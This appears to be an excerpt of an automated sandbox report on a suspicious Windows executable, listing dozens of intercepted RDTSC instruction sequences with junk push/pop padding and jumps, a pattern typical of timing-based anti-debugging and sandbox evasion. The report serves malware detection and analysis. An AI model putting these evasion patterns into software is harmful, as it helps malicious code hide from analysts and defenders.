Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ECE84 second address: 8ECEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007FBF8C4F2A51h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF8C4F2A4Dh 0x00000014 jo 00007FBF8C4F2A46h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ED007 second address: 8ED00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ED00B second address: 8ED00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ED44B second address: 8ED468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2099h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ED468 second address: 8ED46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F0BB7 second address: 8F0BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF8C4F2090h 0x0000000b jmp 00007FBF8C4F2098h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jc 00007FBF8C4F2086h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F0BEF second address: 8F0BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F0BF3 second address: 8F0C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FBF8C4F20A4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F103B second address: 8F1052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FBF8C4F2A4Ch 0x00000011 jns 00007FBF8C4F2A46h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F1052 second address: 8F105C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FBF8C4F2086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F136E second address: 8F138F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F138F second address: 8F13A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2094h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F13A8 second address: 8F13AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F7F0A second address: 8F7F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F7F0E second address: 8F7F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF8C4F2A4Fh 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F81F4 second address: 8F8207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F208Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F89D1 second address: 8F89FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007FBF8C4F2A46h 0x0000000f jmp 00007FBF8C4F2A57h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F89FE second address: 8F8A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F8A02 second address: 8F8A08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F9790 second address: 8F97B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F208Ch 0x00000009 popad 0x0000000a jl 00007FBF8C4F2098h 0x00000010 jmp 00007FBF8C4F208Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F97B5 second address: 8F97B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FDD0D second address: 8FDD13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FDD13 second address: 8FDD1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FDD1A second address: 8FDD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FCED9 second address: 8FCEDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FCEDD second address: 8FCEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF8C4F2086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD087 second address: 8FD0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A50h 0x00000009 jmp 00007FBF8C4F2A56h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF8C4F2A50h 0x00000016 jmp 00007FBF8C4F2A56h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD36F second address: 8FD39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2093h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007FBF8C4F2092h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD39B second address: 8FD3BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FBF8C4F2A46h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FBF8C4F2A4Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FBF8C4F2A46h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD3BF second address: 8FD3CB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF8C4F2086h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD6AF second address: 8FD6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD83B second address: 8FD848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD848 second address: 8FD879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FBF8C4F2A54h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FBF8C4F2A52h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD879 second address: 8FD885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBF8C4F2086h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD885 second address: 8FD899 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF8C4F2A46h 0x00000008 jnp 00007FBF8C4F2A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD899 second address: 8FD8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF8C4F2086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD9F5 second address: 8FD9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD9F9 second address: 8FDA1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FBF8C4F2094h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007FBF8C4F2086h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 90A6F8 second address: 90A71E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A50h 0x00000008 jmp 00007FBF8C4F2A51h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 90A71E second address: 90A727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 908D38 second address: 908D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FBF8C4F2A46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 908D47 second address: 908D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 908EAF second address: 908ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF8C4F2A55h 0x0000000a pop edx 0x0000000b je 00007FBF8C4F2A71h 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FBF8C4F2A46h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9092CD second address: 9092D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9092D1 second address: 9092ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF8C4F2A51h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9092ED second address: 9092F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9092F3 second address: 90930E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FBF8C4F2A52h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 908464 second address: 908476 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FBF8C4F2088h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 912123 second address: 912141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A58h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 912141 second address: 912147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 912147 second address: 91214B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911BA3 second address: 911BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2090h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911BB8 second address: 911BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A4Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911D08 second address: 911D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911E29 second address: 911E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911E31 second address: 911E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911E39 second address: 911E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FBF8C4F2A46h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 91CAE7 second address: 91CAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 91CAEB second address: 91CB13 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2A46h 0x00000008 jmp 00007FBF8C4F2A59h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 91CB13 second address: 91CB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2095h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FBF8C4F2097h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF8C4F208Ah 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 91CB58 second address: 91CB5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9220B8 second address: 9220CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FBF8C4F2086h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9220CA second address: 9220CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9220CE second address: 9220D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92563F second address: 925643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9251FE second address: 92521E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2090h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jnc 00007FBF8C4F2086h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92521E second address: 925224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A194 second address: 92A1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FBF8C4F2086h 0x0000000d je 00007FBF8C4F2086h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A1A7 second address: 92A1AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A1AB second address: 92A1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FBF8C4F2090h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A1C7 second address: 92A1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 92A1CD second address: 92A1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9325DA second address: 9325EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2A50h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9325EE second address: 93261D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FBF8C4F2098h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FBF8C4F2090h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c je 00007FBF8C4F2086h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 93261D second address: 932630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBF8C4F2A46h 0x0000000a popad 0x0000000b js 00007FBF8C4F2A48h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9387DE second address: 9387E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9387E2 second address: 9387FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF8C4F2A51h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939040 second address: 939044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939044 second address: 93904C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 93904C second address: 939071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FBF8C4F2086h 0x00000009 jnc 00007FBF8C4F2086h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jg 00007FBF8C4F208Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939071 second address: 939075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939075 second address: 939095 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBF8C4F2090h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 939095 second address: 939099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 93E6FC second address: 93E72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2097h 0x00000009 jmp 00007FBF8C4F2095h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 93E418 second address: 93E41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 941889 second address: 94188D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 94188D second address: 9418A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007FBF8C4F2A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FBF8C4F2A52h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9418A4 second address: 9418AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
